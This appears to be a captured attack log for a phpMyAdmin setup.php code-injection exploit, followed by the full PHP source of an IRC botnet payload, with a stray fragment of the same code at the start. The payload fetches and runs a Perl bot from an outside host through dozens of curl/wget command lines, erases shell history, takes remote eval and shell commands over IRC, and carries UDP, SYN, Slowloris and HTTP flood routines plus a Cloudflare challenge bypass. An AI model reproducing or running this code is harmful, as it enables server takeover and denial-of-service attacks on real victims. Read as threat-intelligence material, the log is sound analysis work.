fread($fs[$i], 1);
}
sleep(mt_rand(0.5, 2));
}
}
$this->privmsg($this->config['chan'], "[\2Finished Slowread\2]");
}
public function attack_http($mthd, $server, $time) {
$timei = time();
$fs = array();
$this->privmsg($this->config['chan'], "[\2Layer 7 {$mthd} Attack Started On : $server!\2]");
$request = "$mthd / HTTP/1.1\r\n";
$request .= "Host: $server\r\n";
$request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n";
$request .= "Keep-Alive: 900\r\n";
$request .= "Accept: *.*\r\n";
$timei = time();
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($server, 80, $errno, $errstr);
}
while ((time() - $timei < $time)) {
for ($i = 0; $i < 100; $i++) {
if (@fwrite($fs[$i], $request)) {
continue;
} else {
$fs[$i] = @fsockopen($server, 80, $errno, $errstr);
}
}
}
$this->privmsg($this->config['chan'], "[\2Layer 7 {$mthd} Attack Finished!\2]");
}
public function attack_post($server, $host, $time) {
$timei = time();
$fs = array();
$this->privmsg($this->config['chan'], "[\2Layer 7 Post Attack Started On : $server!\2]");
$request = "POST /" . md5(rand()) . " HTTP/1.1\r\n";
$request .= "Host: $host\r\n";
$request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n";
$request .= "Keep-Alive: 900\r\n";
$request .= "Content-Length: 1000000000\r\n";
$request .= "Content-Type: application/x-www-form-urlencoded\r\n";
$request .= "Accept: *.*\r\n";
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($host, 80, $errno, $errstr);
}
while ((time() - $timei < $time)) {
for ($i = 0; $i < 100; $i++) {
if (@fwrite($fs[$i], $request)) {
continue;
} else {
$fs[$i] = @fsockopen($host, 80, $errno, $errstr);
}
}
}
fclose($sockfd);
$this->privmsg($this->config['chan'], "[\2Layer 7 Post Attack Finished!\2]");
}
public function doSlow($host, $time) {
$this->privmsg($this->config['chan'], "[\2SlowLoris Started!\2]");
$timei = time();
$i = 0;
for ($i = 0; $i < 100; $i++) {
$fs[$i] = @fsockopen($host, 80, $errno, $errstr);
}
while ((time() - $timei < $time)) {
for ($i = 0; $i < 100; $i++) {
$out = "POST / HTTP/1.1\r\n";
$out .= "Host: {$host}\r\n";
$out .= "User-Agent: Opera/9.21 (Windows NT 5.1; U; en)\r\n";
$out .= "Content-Length: " . rand(1, 1000) . "\r\n";
$out .= "X-a: " . rand(1, 10000) . "\r\n";
if (@fwrite($fs[$i], $out)) {
continue;
} else {
$fs[$i] = @fsockopen($server, 80, $errno, $errstr);
}
}
}
$this->privmsg($this->config['chan'], "[\2SlowLoris Finished!\2]");
}
public function syn($host, $port, $time, $delay=1) {
$this->privmsg($this->config['chan'], "[\2SYN Started!\2]");
$timei = time();
$socks = array();
while (time() - $timei < $time) {
$numsocks++;
$socks[$numsocks] = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if (!$socks[$numsocks]) continue;
@socket_set_nonblock($socks[$numsocks]);
for ($j = 0; $j < 20; $j++)
@socket_connect($socks[$numsocks], $host, $port);
sleep($delay);
}
$this->privmsg($this->config['chan'], "[\2SYN Finished (".$numsocks." socks created)!\2]");
}
public function synflood($host, $port, $delay) {
$this->privmsg($this->config['chan'], "[\2synFlood Started!\2]");
$socks = array();
$numsocks = 0;
$numsocks++;
$socks[$numsocks] = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if(!$socks[$numsocks])
continue;
@socket_set_nonblock($socks[$numsocks]);
for($j = 0; $j < 20; $j++)
@socket_connect($socks[$numsocks], $host, $port);
sleep($delay);
for ($j = 0; $j < $numsocks; $j++) {
if($socks[$j])
@socket_close($socks[$j]);
}
$this->privmsg($this->config['chan'], "[\2SynFlood Finished!\2]: Config - For $host:$port.");
}
public function udpflood($host, $port, $time, $packetsize) {
$this->privmsg($this->config['chan'], "4,1 [#FLOOD] -> 9,1Atacul a fost initiat!");
$packet = "";
for ($i = 0; $i < $packetsize; $i++) {
$packet .= chr(rand(1, 256));
}
$end = time() + $time;
$i = 0;
$fp = fsockopen("udp://" . $host, $port, $e, $s, 5);
while (true) {
fwrite($fp, $packet);
fflush($fp);
if ($i % 100 == 0) {
if($end < time())
break;
}
$i++;
}
fclose($fp);
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'], "4,1 [#FLOOD] -> 9,1Atac terminat cu succes: 12" . $env . " MB trimisi / Medie: " . $vel . " MB/s ");
}
public function tcpconn($host, $port, $time) {
$this->privmsg($this->config['chan'], "[\2#TKH -> !\2]");
$end = time() + $time;
$i = 0;
while ($end > time()) {
$fp = fsockopen($host, $port, $dummy, $dummy, 1);
fclose($fp);
$i++;
}
$this->privmsg($this->config['chan'], "[\2TcpFlood Finished!\2]: sent " . $i . " connections to $host:$port.");
}
}
$bot = new pBot;
$bot->start($cfg);
function curl($url, $post=array(), $user_agent="", $deleteCookies=false) {
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_URL, $url);
if ($user_agent) {
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
}
if (!empty($post)) {
curl_setopt($ch,CURLOPT_POST, 1);
curl_setopt($ch,CURLOPT_POSTFIELDS, $post);
}
if ($deleteCookies) {
file_put_contents("cookie.txt", "");
}
curl_setopt ($ch, CURLOPT_COOKIEJAR, "cookie.txt");
curl_setopt ($ch, CURLOPT_COOKIEFILE, "cookie.txt");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$result = curl_exec($ch);
//$statusCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
return $result;
}
function get_between($string,$start,$end) {
$string = " ".$string;
$ini = strpos($string, $start);
if($ini==0) return "";
$ini += strlen($start);
$len = strpos($string, $end, $ini) - $ini;
return substr($string, $ini, $len);
}
phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit
[Attack info]
Attacker:
51.75.68.146
Dest. port: 80
Time: 17/02/2019 08:32:21
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS16276 OVH SAS
Location: Hauts-de-France, Roubaix (zipcode 59100)
rDNS: 146.ip-51-75-68.eu
Description
phpMyAdmin is prone to a remote PHP code-injection vulnerability on the page "setup.php". An attacker can exploit this issue to inject and execute arbitrary malicious PHP code in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible. Versions prior to phpMyAdmin 2.11.9.5 and 3.1.3.1 are vulnerable.CVE
CVE-2009-1151Author
Adrian "pagvac" PastorPlugin ID
oosheefee1baixeinief5nociu5shohhPOST /phpmyadmin/scripts/setup.php HTTP/1.1
Content-Length: 231
cookie2: $Version="1"
Host: 21.171.51.29
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]
connection: TE
referer: http://21.171.51.29/phpmyadmin/scripts/setup.php
cookie: phpMyAdmin=d007a44761984bd2008c50bad4ee5c17
te: deflate,gzip;q=0.3
Content-Type: application/x-www-form-urlencoded
action=lay_navigation&eoltype=unix&token=d7961c1f90c9e481f0aa6d63b1d8009d&configuration=a%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA%5FConfig%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A24%3A%22ftp%3A%2F%2F51%2E75%2E68%2E146%2Fpub%2Fx%22%3B%7D%7D
Resource ( 1 / 1 )
MD5: d9030cacb19a6bff1f4c5f78d1288ac7
Type: text/x-php
Size: 44240
URL: ftp://51.75.68.146/pub/x
# SUCK MY DICK HONERIX!!! :)))
# _|_!!
<?php
$cfg = array(
"server" => "91.134.146.175",
"port" => "1984",
"key" => "",
"prefix" => "|",
"maxrand" => "9",
"chan" => "#test",
"trigger" => "",
"hostauth" => "sidehost"
);
set_time_limit(0);
error_reporting(0);
$dir = getcwd();
$uname = @php_uname();
$url="http://92.222.68.32/";
exec('cd /tmp;curl -O '.$url.'bot.pl;perl bot.pl;rm -f bot.pl*;');
exec('cd /tmp;GET '.$url.'bot.pl > bot.pl;perl bot.pl;rm -f bot.pl*;');
exec('cd /tmp;wget '.$url.'bot.pl;perl bot.pl;rm -f bot.pl*;');
exec('cd /tmp;lwp-download '.$url.'bot.pl;perl bot.pl;perl bot.pl?;rm -f bot.pl*;');
exec('cd /tmp;fetch '.$url.'bot.pl >bot.pl;perl bot.pl;rm -f bot.pl*;');
passthru('cd /tmp;fetch '.$url.'bot.pl >bot.pl;perl bot.pl;rm -f bot.pl*;');
passthru('cd /tmp;wget '.$url.'bot.pl;perl bot.pl;rm -f bot.pl*;');
passthru('cd /tmp;lwp-download '.$url.'bot.pl;perl bot.pl;perl bot.pl?;rm -f bot.pl*;');
passthru('cd /tmp;curl -O '.$url.'bot.pl;perl bot.pl;rm -f bot.pl*;');
passthru('cd /tmp;GET '.$url.'bot.pl >bot.pl;perl bot.pl;rm -f bot.pl*;');
system('cd /tmp;curl -O '.$url.'bot.pl;perl bot.pl;rm -f bot.pl*;');
system('cd /tmp;GET '.$url.'bot.pl >bot.pl;perl bot.pl;rm -f bot.pl*;');
system('cd /tmp;wget '.$url.'bot.pl;perl bot.pl;rm -f bot.pl*;');
system('cd /tmp;lwp-download '.$url.'bot.pl;perl bot.pl;perl bot.pl?;rm -f bot.pl*;');
system('cd /tmp;fetch '.$url.'bot.pl >bot.pl;perl bot.pl;rm -f bot.pl*;');
shell_exec('cd /tmp;curl -O '.$url.'bot.pl;perl bot.pl;rm -f bot.pl*;');
shell_exec('cd /tmp;GET '.$url.'bot.pl >bot.pl;perl bot.pl;rm -f bot.pl*;');
shell_exec('cd /tmp;wget '.$url.'bot.pl;perl bot.pl;rm -f bot.pl*;');
shell_exec('cd /tmp;lwp-download '.$url.'bot.pl;perl bot.pl;perl bot.pl?;rm -f bot.pl*;');
shell_exec('cd /tmp;fetch '.$url.'bot.pl >bot.pl;perl bot.pl;rm -f bot.pl*;');
popen('cd /tmp;wget '.$url.'bot.pl;perl bot.pl;rm bot.pl*;/usr/bin/perl bot.pl;rm -f $HISTFILE', "r");
popen('cd /tmp;curl -O '.$url.'bot.pl; perl bot.pl;rm bot.pl*;/usr/bin/perl bot.pl;rm -f $HISTFILE', "r");
popen('cd /tmp;lwp-download '.$url.'bot.pl;perl bot.pl;/usr/bin/perl bot.pl;rm -f $HISTFILE', "r");
popen('cd /tmp;lynx -source '.$url.'bot.pl >bot.pl;perl bot.pl;/usr/bin/perl bot.pl;rm -f $HISTFILE', "r");
popen('cd /tmp;fetch '.$url.'bot.pl >bot.pl;perl bot.pl;/usr/bin/perl bot.pl;rm -f $HISTFILE', "r");
popen('cd /tmp;GET '.$url.'bot.pl >bot.pl;perl bot.pl;/usr/bin/perl bot.pl;rm -f $HISTFILE', "r");
@exec('cd /tmp;curl -O '.$url.'bot.pl;perl bot.pl;rm -f bot.pl*;');
@exec('cd /tmp;GET '.$url.'bot.pl > bot.pl;perl bot.pl;rm -f bot.pl*;');
@exec('cd /tmp;wget '.$url.'bot.pl;perl bot.pl;rm -f bot.pl*;');
@exec('cd /tmp;lwp-download '.$url.'bot.pl;perl bot.pl;perl bot.pl?;rm -f bot.pl*;');
@exec('cd /tmp;fetch '.$url.'bot.pl >bot.pl;perl bot.pl;rm -f bot.pl*;');
@passthru('cd /tmp;fetch '.$url.'bot.pl >bot.pl;perl bot.pl;rm -f bot.pl*;');
@passthru('cd /tmp;wget '.$url.'bot.pl;perl bot.pl;rm -f bot.pl*;');
@passthru('cd /tmp;lwp-download '.$url.'bot.pl;perl bot.pl;perl bot.pl?;rm -f bot.pl*;');
@passthru('cd /tmp;curl -O '.$url.'bot.pl;perl bot.pl;rm -f bot.pl*;');
@passthru('cd /tmp;GET '.$url.'bot.pl >bot.pl;perl bot.pl;rm -f bot.pl*;');
@system('cd /tmp;curl -O '.$url.'bot.pl;perl bot.pl;rm -f bot.pl*;');
@system('cd /tmp;GET '.$url.'bot.pl >bot.pl;perl bot.pl;rm -f bot.pl*;');
@system('cd /tmp;wget '.$url.'bot.pl;perl bot.pl;rm -f bot.pl*;');
@system('cd /tmp;lwp-download '.$url.'bot.pl;perl bot.pl;perl bot.pl?;rm -f bot.pl*;');
@system('cd /tmp;fetch '.$url.'bot.pl >bot.pl;perl bot.pl;rm -f bot.pl*;');
@shell_exec('cd /tmp;curl -O '.$url.'bot.pl;perl bot.pl;rm -f bot.pl*;');
@shell_exec('cd /tmp;GET '.$url.'bot.pl >bot.pl;perl bot.pl;rm -f bot.pl*;');
@shell_exec('cd /tmp;wget '.$url.'bot.pl;perl bot.pl;rm -f bot.pl*;');
@shell_exec('cd /tmp;lwp-download '.$url.'bot.pl;perl bot.pl;perl bot.pl?;rm -f bot.pl*;');
@shell_exec('cd /tmp;fetch '.$url.'bot.pl >bot.pl;perl bot.pl;rm -f bot.pl*;');
@popen('cd /tmp;wget '.$url.'bot.pl;perl bot.pl;rm bot.pl*;/usr/bin/perl bot.pl;rm -f $HISTFILE', "r");
@popen('cd /tmp;curl -O '.$url.'bot.pl; perl bot.pl;rm bot.pl*;/usr/bin/perl bot.pl;rm -f $HISTFILE', "r");
@popen('cd /tmp;lwp-download '.$url.'bot.pl;perl bot.pl;/usr/bin/perl bot.pl;rm -f $HISTFILE', "r");
@popen('cd /tmp;lynx -source '.$url.'bot.pl >bot.pl;perl bot.pl;/usr/bin/perl bot.pl;rm -f $HISTFILE', "r");
@popen('cd /tmp;fetch '.$url.'bot.pl >bot.pl;perl bot.pl;/usr/bin/perl bot.pl;rm -f $HISTFILE', "r");
@popen('cd /tmp;GET '.$url.'bot.pl >bot.pl;perl bot.pl;/usr/bin/perl bot.pl;rm -f $HISTFILE', "r");
function whereistmP() {
$uploadtmp = ini_get('upload_tmp_dir');
$uf = getenv('USERPROFILE');
$af = getenv('ALLUSERSPROFILE');
$se = ini_get('session.save_path');
$envtmp = (getenv('TMP')) ? getenv('TMP') : getenv('TEMP');
if(is_dir('/tmp') && is_writable('/tmp'))
return '/tmp';
if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))
return '/usr/tmp';
if(is_dir('/var/tmp') && is_writable('/var/tmp'))
return '/var/tmp';
if(is_dir($uf) && is_writable($uf))
return $uf;
if(is_dir($af) && is_writable($af))
return $af;
if(is_dir($se) && is_writable($se))
return $se;
if(is_dir($uploadtmp) && is_writable($uploadtmp))
return $uploadtmp;
if(is_dir($envtmp) && is_writable($envtmp))
return $envtmp;
return '.';
}
function srvshelL($command) {
$name = whereistmP() . "\\" . uniqid('NJ');
$n = uniqid('NJ');
$cmd = (empty($_SERVER['ComSpec'])) ? 'd:\\windows\\system32\\cmd.exe' : $_SERVER['ComSpec'];
win32_create_service(array(
'service' => $n,
'display' => $n,
'path' => $cmd,
'params' => "/c $command >\"$name\""
));
win32_start_service($n);
win32_stop_service($n);
win32_delete_service($n);
while(!file_exists($name))
sleep(1);
$exec = file_get_contents($name);
unlink($name);
return $exec;
}
function ffishelL($command) {
$name = whereistmP() . "\\" . uniqid('NJ');
$api = new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
$res = $api->WinExec("cmd.exe /c $command >\"$name\"", 0);
while(!file_exists($name))
sleep(1);
$exec = file_get_contents($name);
unlink($name);
return $exec;
}
function comshelL($command, $ws) {
$exec = $ws->exec("cmd.exe /c $command");
$so = $exec->StdOut();
return $so->ReadAll();
}
function perlshelL($command) {
$perl = new perl();
ob_start();
$perl->eval("system(\"$command\")");
$exec = ob_get_contents();
ob_end_clean();
return $exec;
}
function Exe($command) {
$exec = $output = '';
$dep[] = array(
'pipe',
'r'
);
$dep[] = array(
'pipe',
'w'
);
if (function_exists('passthru')) {
ob_start();
@passthru($command);
$exec = ob_get_contents();
ob_clean();
ob_end_clean();
} elseif (function_exists('system')) {
$tmp = ob_get_contents();
ob_clean();
@system($command);
$output = ob_get_contents();
ob_clean();
$exec = $tmp;
} elseif (function_exists('exec')) {
@exec($command, $output);
$output = join("\n", $output);
$exec = $output;
} elseif(function_exists('shell_exec'))
$exec = @shell_exec($command);
elseif (function_exists('popen')) {
$output = @popen($command, 'r');
while (!feof($output)) {
$exec = fgets($output);
}
pclose($output);
} elseif (function_exists('proc_open')) {
$res = @proc_open($command, $dep, $pipes);
while (!feof($pipes[1])) {
$line = fgets($pipes[1]);
$output .= $line;
}
$exec = $output;
proc_close($res);
} elseif(function_exists('win_shell_execute') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
$exec = winshelL($command);
elseif(function_exists('win32_create_service') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
$exec = srvshelL($command);
elseif(extension_loaded('ffi') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
$exec = ffishelL($command);
elseif(extension_loaded('perl'))
$exec = perlshelL($command);
return $exec;
}
class pBot {
public $config = '';
public $user_agents = array(
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.60 Safari/537.17",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2",
"Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20120403211507 Firefox/12.0",
"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)",
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)",
"Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00"
);
public $charset = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
public $users = array();
public function start($cfg) {
$this->config = $cfg;
while (true) {
if(!($this->conn = fsockopen($this->config['server'], $this->config['port'], $e, $s, 30)))
$this->start($cfg);
$ident = $this->config['prefix'];
$alph = range("0", "9");
for($i = 0; $i < $this->config['maxrand']; $i++)
$ident .= $alph[rand(0, 9)];
$this->send("USER " . $ident . " 127.0.0.1 localhost :" . php_uname() . "");
$this->set_nick();
$this->main();
}
}
public function main() {
while (!feof($this->conn)) {
if (function_exists('stream_select')) {
$read = array(
$this->conn
);
$write = NULL;
$except = NULL;
$changed = stream_select($read, $write, $except, 30);
if ($changed == 0) {
fwrite($this->conn, "PING :lelcomeatme\r\n");
$read = array(
$this->conn
);
$write = NULL;
$except = NULL;
$changed = stream_select($read, $write, $except, 30);
if($changed == 0)
break;
}
}
$this->buf = trim(fgets($this->conn, 512));
$cmd = explode(" ", $this->buf);
if (substr($this->buf, 0, 6) == "PING :") {
$this->send("PONG :" . substr($this->buf, 6));
continue;
}
if (isset($cmd[1]) && $cmd[1] == "001") {
$this->join($this->config['chan'], $this->config['key']);
continue;
}
if (isset($cmd[1]) && $cmd[1] == "433") {
$this->set_nick();
continue;
}
if ($this->buf != $old_buf) {
$mcmd = array();
$msg = substr(strstr($this->buf, " :"), 2);
$msgcmd = explode(" ", $msg);
$nick = explode("!", $cmd[0]);
$vhost = explode("@", $nick[1]);
$vhost = $vhost[1];
$nick = substr($nick[0], 1);
$host = $cmd[0];
if($msgcmd[0] == $this->nick)
for($i = 0; $i < count($msgcmd); $i++)
$mcmd[$i] = $msgcmd[$i + 1];
else
for($i = 0; $i < count($msgcmd); $i++)
$mcmd[$i] = $msgcmd[$i];
if (count($cmd) > 2) {
switch ($cmd[1]) {
case "PRIVMSG":
if ($vhost == $this->config['hostauth'] || $this->config['hostauth'] == "*") {
if (substr($mcmd[0], 0, 1) == ".") {
switch (substr($mcmd[0], 1)) {
case "mail":
if (count($mcmd) > 4) {
$header = "From: <" . $mcmd[2] . ">";
if (!mail($mcmd[1], $mcmd[3], strstr($msg, $mcmd[4]), $header)) {
$this->privmsg($this->config['chan'], "[\2mail\2]: failed sending.");
} else {
$this->privmsg($this->config['chan'], "[\2mail\2]: sent.");
}
}
break;
case "dns":
if (isset($mcmd[1])) {
$ip = explode(".", $mcmd[1]);
if (count($ip) == 4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3])) {
$this->privmsg($this->config['chan'], "[\2dns\2]: " . $mcmd[1] . " => " . gethostbyaddr($mcmd[1]));
} else {
$this->privmsg($this->config['chan'], "[\2dns\2]: " . $mcmd[1] . " => " . gethostbyname($mcmd[1]));
}
}
break;
case "uname":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") {
$safemode = "on";
} else {
$safemode = "off";
}
$uname = php_uname();
$this->privmsg($this->config['chan'], "[\2info\2]: " . $uname . " (safe: " . $safemode . ")");
break;
case "rndnick":
$this->set_nick();
break;
case "raw":
$this->send(strstr($msg, $mcmd[1]));
break;
case "eval":
ob_start();
eval(strstr($msg, $mcmd[1]));
$exec = ob_get_contents();
ob_end_clean();
$ret = explode("\n", $exec);
for($i = 0; $i < count($ret); $i++)
if($ret[$i] != NULL)
$this->privmsg($this->config['chan'], " : " . trim($ret[$i]));
break;
case "exec":
$command = substr(strstr($msg, $mcmd[0]), strlen($mcmd[0]) + 1);
$exec = exec($command);
$ret = explode("\n", $exec);
for($i = 0; $i < count($ret); $i++)
if($ret[$i] != NULL)
$this->privmsg($this->config['chan'], " : " . trim($ret[$i]));
break;
case "cmd":
$command = substr(strstr($msg, $mcmd[0]), strlen($mcmd[0]) + 1);
$exec = Exe($command);
$ret = explode("\n", $exec);
for($i = 0; $i < count($ret); $i++)
if($ret[$i] != NULL)
$this->privmsg($this->config['chan'], " : " . trim($ret[$i]));
break;
case "ud.server":
if (count($mcmd) > 2) {
$this->config['server'] = $mcmd[1];
$this->config['port'] = $mcmd[2];
if (isset($mcmcd[3])) {
$this->config['pass'] = $mcmd[3];
$this->privmsg($this->config['chan'], "[\2update\2]: info updated " . $mcmd[1] . ":" . $mcmd[2] . " pass: " . $mcmd[3]);
} else {
$this->privmsg($this->config['chan'], "[\2update\2]: switched server to " . $mcmd[1] . ":" . $mcmd[2]);
}
fclose($this->conn);
}
break;
case "download":
if (count($mcmd) > 2) {
if (!$fp = fopen($mcmd[2], "w")) {
$this->privmsg($this->config['chan'], "[\2download\2]: could not open output file.");
} else {
if (!$get = file($mcmd[1])) {
$this->privmsg($this->config['chan'], "[\2download\2]: could not download \2" . $mcmd[1] . "\2");
} else {
for ($i = 0; $i <= count($get); $i++) {
fwrite($fp, $get[$i]);
}
$this->privmsg($this->config['chan'], "[\2download\2]: file \2" . $mcmd[1] . "\2 downloaded to \2" . $mcmd[2] . "\2");
}
fclose($fp);
}
} else {
$this->privmsg($this->config['chan'], "[\2download\2]: use .download http://your.host/file /tmp/file");
}
break;
case "udpflood":
if (count($mcmd) > 4) {
$this->udpflood($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4]);
}
break;
case "tcpconn":
if (count($mcmd) > 5) {
$this->tcpconn($mcmd[1], $mcmd[2], $mcmd[3]);
}
break;
case "rudy":
if (count($mcmd) > 2) {
$this->doSlow($mcmd[1], $mcmd[2]);
}
break;
case "slowread":
if (count($mcmd) > 3) {
$this->slowRead($mcmd[1], $mcmd[2], $mcmd[3]);
}
break;
case "slowloris":
if (count($mcmd) > 2) {
$this->doSlow($mcmd[1], $mcmd[2]);
}
break;
case "synflood":
if (count($mcmd) > 3) {
$this->synflood($mcmd[1], $mcmd[2], $mcmd[3]);
}
case "l7":
if (count($mcmd) > 3) {
if ($mcmd[1] == "get") {
$this->attack_http("GET", $mcmd[2], $mcmd[3]);
}
if ($mcmd[1] == "post") {
$this->attack_post($mcmd[2], $mcmd[3]);
}
if ($mcmd[1] == "head") {
$this->attack_http("HEAD", $mcmd[2], $mcmd[3]);
}
}
break;
case "syn":
if (count($mcmd) > 2) {
$this->syn($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4]);
} else {
$this->privmsg($this->config['chan'], "syntax: syn host port time [delaySeconds]");
}
break;
case "tcpflood":
if (count($mcmd) > 2) {
$this->tcpflood($mcmd[1], $mcmd[2], $mcmd[3]);
} else {
$this->privmsg($this->config['chan'], "syntax: tcpflood host port time");
}
break;
case "httpflood":
if (count($mcmd) > 2) {
$this->httpflood($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4], $mcmd[5]);
} else {
$this->privmsg($this->config['chan'], "syntax: httpflood host port time [method] [url]");
}
break;
case "proxyhttpflood":
if (count($mcmd) > 2) {
$this->proxyhttpflood($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4]);
} else {
$this->privmsg($this->config['chan'], "syntax: proxyhttpflood targetUrl(with http://) proxyListUrl time [method]");
}
break;
case "cloudflareflood":
print_r($mcmd);
if (count($mcmd) > 2) {
$this->cloudflareflood($mcmd[1], $mcmd[2], $mcmd[3], $mcmd[4], $mcmd[5], $mcmd[6]);
} else {
$this->privmsg($this->config['chan'], "syntax: cloudflareflood host port time [method] [url] [postFields]");
}
break;
}
}
}
break;
}
}
}
}
}
public function send($msg) {
fwrite($this->conn, $msg . "\r\n");
}
public function join($chan, $key = NULL) {
$this->send("JOIN " . $chan . " " . $key);
}
public function privmsg($to, $msg) {
$this->send("PRIVMSG " . $to . " :" . $msg);
}
public function notice($to, $msg) {
$this->send("NOTICE " . $to . " :" . $msg);
}
public function set_nick() {
$fp = fsockopen("freegeoip.net", 80, $dummy, $dummy, 30);
if(!$fp)
$this->nick = "[UKN]";
else {
fclose($fp);
$ctx = stream_context_create(array(
'http' => array(
'timeout' => 30
)
));
$buf = file_get_contents("http://freegeoip.net/json/", 0, $ctx);
if(!strstr($buf, "country_code"))
$this->nick = "[UKN]";
else {
$code = strstr($buf, "country_code");
$code = substr($code, 12);
$code = substr($code, 3, 2);
$this->nick = "[" . $code . "]";
}
}
if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
$this->nick .= "[WIN32]";
else
$this->nick .= "[LINUX]";
if (isset($_SERVER['SERVER_SOFTWARE'])) {
if(strstr(strtolower($_SERVER['SERVER_SOFTWARE']), "apache"))
$this->nick .= "[A]";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']), "iis"))
$this->nick .= "[I]";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']), "xitami"))
$this->nick .= "[X]";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']), "nginx"))
$this->nick .= "[N]";
else
$this->nick .= "[U]";
} else {
$this->nick .= "[C]";
}
$this->nick .= $this->config['prefix'];
for($i = 0; $i < $this->config['maxrand']; $i++)
$this->nick .= mt_rand(0, 9);
$this->send("NICK " . $this->nick);
}
public function cloudflareflood($host, $port, $time, $method="GET", $url="/", $post=array()) {
$this->privmsg($this->config['chan'], "[\2CloudFlareFlood Started!\2]");
$timei = time();
$user_agent = $this->user_agents[rand(0, count($this->user_agents)-1)];
$packet = "$method $url HTTP/1.1\r\n";
$packet .= "Host: $host\r\n";
$packet .= "Keep-Alive: 300\r\n";
$packet .= "Connection: keep-alive\r\n";
$packet .= "User-Agent: $user_agent\r\n";
//Cloudflare Bypass
$res = curl($host, null, $user_agent, true);
//Cloudflare Bypass
if (strstr($res, "DDoS protection by CloudFlare")) {
$this->privmsg($this->config['chan'], "[\2CloudFlare detected!...\2]");
//Get the math calc
$math_calc = get_between($res, "a.value = ", ";");
if ($math_calc) {
$math_result = (int) eval("return ($math_calc);");
if (is_numeric($math_result)) {
$math_result += strlen($host); //Domain lenght
//Send the CloudFlare's form
$getData = "cdn-cgi/l/chk_jschl";
$getData .= "?jschl_vc=".get_between($res, 'name="jschl_vc" value="', '"');
$getData .= "&jschl_answer=".$math_result;
$res = curl($host.$getData, null, $user_agent);
//Cloudflare Bypassed?
if (strstr($res, "DDoS protection by CloudFlare")) {
$this->privmsg($this->config['chan'], "[\2CloudFlare not bypassed...\2]");
return false;
} else {
$bypassed = true;
//Cookie read
$cookie = trim(get_between(file_get_contents("cookie.txt"), "__cfduid", "\n"));
$packet .= "Cookie: __cfduid=".$cookie."\r\n\r\n";
}
}
}
} else {
$this->privmsg($this->config['chan'], "[\2CloudFlare not detected...\2]");
}
if ($bypassed) {
$this->privmsg($this->config['chan'], "[\2CloudFlare bypassed!\2]");
}
$this->privmsg($this->config['chan'], "[\2Flodding...\2]");
while (time() - $timei < $time) {
$handle = fsockopen($host, $port, $errno, $errstr, 1);
fwrite($handle, $packet);
}
$this->privmsg($this->config['chan'], "[\2CloudFlareFlood Finished!\2]");
}
public function httpflood($host, $port, $time, $method="GET", $url="/") {
$this->privmsg($this->config['chan'], "[\2HttpFlood Started!\2]");
$timei = time();
$user_agent = $this->user_agents[rand(0, count($this->user_agents)-1)];
$packet = "$method $url HTTP/1.1\r\n";
$packet .= "Host: $host\r\n";
$packet .= "Keep-Alive: 900\r\n";
$packet .= "Cache-Control: no-cache\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$packet .= "Accept-Language: en-GB,en-US;q=0.8,en;q=0.6\r\n";
$packet .= "Accept-charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n";
$packet .= "Connection: keep-alive\r\n";
$packet .= "User-Agent: $user_agent\r\n\r\n";
while (time() - $timei < $time) {
$handle = fsockopen($host, $port, $errno, $errstr, 1);
fwrite($handle, $packet);
}
